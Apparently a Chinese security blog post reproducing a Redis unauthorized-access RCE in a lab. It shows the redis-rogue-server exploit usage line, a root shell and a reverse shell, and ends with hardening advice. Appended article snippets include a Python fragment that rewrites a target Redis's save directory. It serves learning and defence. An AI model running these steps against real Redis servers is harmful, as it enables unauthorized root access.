Redis RCE 反弹shell 漏洞复现

最新推荐文章于 2025-03-27 13:00:26 发布
最新推荐文章于 2025-03-27 13:00:26 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: 漏洞分析与复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_25500649/article/details/117564497
版权

1 Redis简介

Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库,并提供多种语言的API。

Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作。

2 影响版本

Redis 2.x,3.x,4.x,5.x

3 环境搭建和漏洞复现

靶机系统:ubuntu 20.04 LTS  ip:192.168.210.209

攻击机:kali linux ip: 192.168.146.128

3.1 安装Redis

使用下面的命令安装redis,我这里使用apt直接安装,安装的版本是5.0.7.

sudo apt install redis

3.2 修改redis.conf文件

我这里就是修改/etc/redis/redis.conf文件,首先关闭redis保护模式,将protected-mode修改为no,

然后修改bind,绑定到0.0.0.0

这里需要注意的是,bind不是绑定外部服务器,二十绑定本机可以接受连接的网卡地址,默认绑定127.0.0.1,只能够本地访问,改动后服务器上任意网卡地址都可以访问。

3.3 启动redis服务

sudo /usr/bin/redis-server /etc/redis/redis.conf

3.4 exp

我们这里使用github上的一个exp,链接地址如下:

https://github.com/n0b0dyCN/redis-rogue-server

用法:

python redis-rogue-server.py --rhost 127.0.0.1 --rport 6379 --lhost 127.0.0.1 --exp exp.so
  • rhost:这里是远程redis服务所在的地址
  • rport为redis服务端口,
  • lhost:本地地址
  • exp:而已so文件

 

这里可以看到,这里的redis确实有漏洞,我们可以获取一个实时的shell或者获取反弹shell。我们在这里先获取一个实时的shell,只需要输入i即可。

我们这杨就获取到了root权限的shell,接下来尝试获取反弹shell。

我们看到在这里输入反弹ip和端口后,就可以反弹shell到我们的攻击机上,同样获取到的是root权限。

4 建议

  1. 限制登录IP,不要修改bind 为0.0.0.0.
  2. 添加密码访问。
  3. 打开redis保护模式。
  4. 修改默认端口。

 

 

 

 

 

Redis未授权访问反弹shell
Sylon的博客
11-21 1479
0x01:前言 这是10月份写的文章 一直放到电脑上居然忘掉了 我丢!! Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 Redis因配置不当可以未授权访问(窃取数据、反弹sh...
Redis未授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
基于JavaScript的rce反弹shell漏洞
qq_41679358的博客
08-17 3494
本文转自行云博客https://www.xy586.top/ 文章目录环境要求工具地址攻击步骤 环境要求 kali攻击机 192.168.232.131 win10靶机 192.168.232.140 工具地址 https://github.com/CroweCybersecurity/ps1encode 攻击步骤 拉取工具到kali的根目录下 git clone https://github.com/CroweCybersecurity/ps1encode.git 给权限 chmod +x pslen.
redis未授权访问
最新发布
欢迎大家,一起努力!
03-27 1009
Redis主从复制允许一个Redis服务器(主节点)将数据同步给一个或多个Redis服务器(从节点)。这个过程是自动的,通常用于数据备份、读写分离和故障转移等场景。
Python安全脚本之RCE反弹shell
weixin_60830484的博客
03-20 628
本次基于DVWA靶场进行的一次针对简单RCE漏洞反弹shell脚本的编写
ssrf,利用redis反弹shell
qq_67757718的博客
03-20 630
在docker中搭建容器,利用ssrf的漏洞攻击redis服务反弹shell
SSRF——手把手教你Redis反弹Shell
sudu2020dd的博客
06-04 4165
由于业务运行的服务器处于内外网边界,并且可通过利用当前的这台服务器,根据所在的网络,访问到与外部网络隔离的内网应用,所以一般情况下,SSRF漏洞的攻击目标是攻击者无法直接访问的内网系统。因为攻击Redis A之前,首先需要构造一个样本,如何构造,通过在kali本地搭建一个Redis B,作为本地测试,形成攻击链后将他的格式转换为gopher协议,然后测试完毕后,应用在真实攻击上,将gopher协议数据包发送给存在SSRF漏洞的机器实现攻击,转给Redis A,写一个计划任务,反弹shell,往kali弹。
Redis未授权访问漏洞复现及利用
Lilin's博客
03-20 1081
Redis未授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis未授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
漏洞复现-Ruoyi若依系列
热门推荐
aming小老弟
05-02 2万+
官方漏洞历史文档。
渗透测试-Redis未授权访问漏洞利用
cdyunaq的博客
12-24 1251
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis 沙盒逃逸漏洞复现(CVE-2022-0543)
hicode0101的博客
01-17 710
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。值得注意的是,不同环境下的liblua库路径不同,你需要指定一个正确的路径。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。
ubuntu的redis反弹shell总结
qq_15042405的博客
02-25 1467
ubuntu的redis反弹shell总结 ubuntu要执行有三点: 1、ubuntu的默认执行命令的为/bin/dash,我们使用bash -i肯定是弹不了的。 2、ubuntu计划任务运行有语法要求,redis写入的文件存在缓存数据,导致语法错误无法运行计划任务。 3、文件需要是600 rw权限,权限不对也不能运行,不过我直接写入貌似就是600 rw。 参考链接:http://www.vkxss.top/2019/05/28/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-R
redis计划任务反弹shell
干铮的博客
01-31 3248
1.环境搭建 Ubuntu16.04安装redis sudo apt-get install redis-server vim /etc/redis/redis.conf 注释掉密码和仅允许本地访问 kali 安装redis-cli进行连接 wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make //全局生效 cp src/redis
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2366
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2285
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
redis 未授权访问配合计划任务反弹shell
m0_65096687的博客
05-23 1646
(1)redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;(2)没有设置密码认证(一般为空),可以免密码远程登录redis服务。然后直接本地开个nc。
从0到1浅析Redis服务器反弹Shell那些事
道阻且长,行则将至
12-29 3181
本文学习了 Redis 服务的作用,并本地搭建了 Redis 服务,同时介绍了其相关基础使用方法和核心安全配置。然后总结分析了 Redis 未授权访问漏洞或弱口令导致 Redis 服务被攻击者操控后,如何进一步通过反弹 Shell 接管服务器。
WebLogic SSRF漏洞攻击内网Redis以及反弹shell
SoulCat
02-08 4037
WebLogic SSRF漏洞攻击内网Redis以及反弹shell 漏洞概述: -通俗的讲weblogci是一种web容器,首先判断redis(内网ip和端口),由于Redis是通过换行符来分隔每条命令,可以通过传入%0a%0d来注入换行符,发送redis命令,将弹shell脚本写入/etc/crontab中(crontab是一个linux一个定时执行事件的一个程序),然后getshell。 基本...
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5996
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Redis未授权访问漏洞复现
01-20
### Redis 未授权访问漏洞复现步骤 对于 Redis 未授权访问漏洞复现,可以按照以下方法进行操作: #### 配置环境准备 为了模拟真实的攻击场景并测试安全措施的有效性,需先搭建一个实验环境。确保所使用的 Redis 实例处于隔离环境中,以免造成实际生产系统的风险。 #### 设置无认证模式下的 Redis 服务 默认情况下,如果 Redis 安装完成后没有配置 `requirepass` 参数,则任何客户端都可以连接到该实例而无需提供密码验证[^3]。 ```bash # 查看当前配置状态 cat /usr/local/redis/6379.conf | grep requirepass ``` 当发现上述命令返回为空时,意味着此时 Redis 正运行于开放状态下,允许任意 IP 地址发起请求。 #### 利用工具探测目标主机上的 Redis 状态 通过 nmap 或者其他网络扫描器来检测远程机器上是否存在暴露在外网端口为 6379 的 Redis 数据库实例,并尝试与其建立连接。 ```bash nmap -p 6379 <target_ip> ``` 一旦确认存在这样的情况,就可以利用 Python 脚本或者其他编程语言编写简单的程序去读取或写入数据至数据库内。 #### 执行恶意指令 假设已经成功连上了这台脆弱的服务端设备,那么攻击者便能执行诸如获取键值对、修改配置甚至是发送 shutdown 关闭服务器等危险动作[^2]。 ```python import redis r = redis.Redis(host='<target_ip>', port=6379, db=0) print(r.get('some_key')) # 获取某个 key 对应 value r.set('new_key', 'value') # 插入新的记录 r.config_set('dir', '/tmp/') # 更改工作目录以便后续保存 RDB 文件 r.save() # 强制立即持久化内存中的数据集到磁盘 ``` 以上就是关于 Redis 未授权访问漏洞的一个简单重现过程描述。值得注意的是,在真实世界里实施此类行为属于非法入侵计算机信息系统罪,请务必仅限于合法合规的学习研究用途之内。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值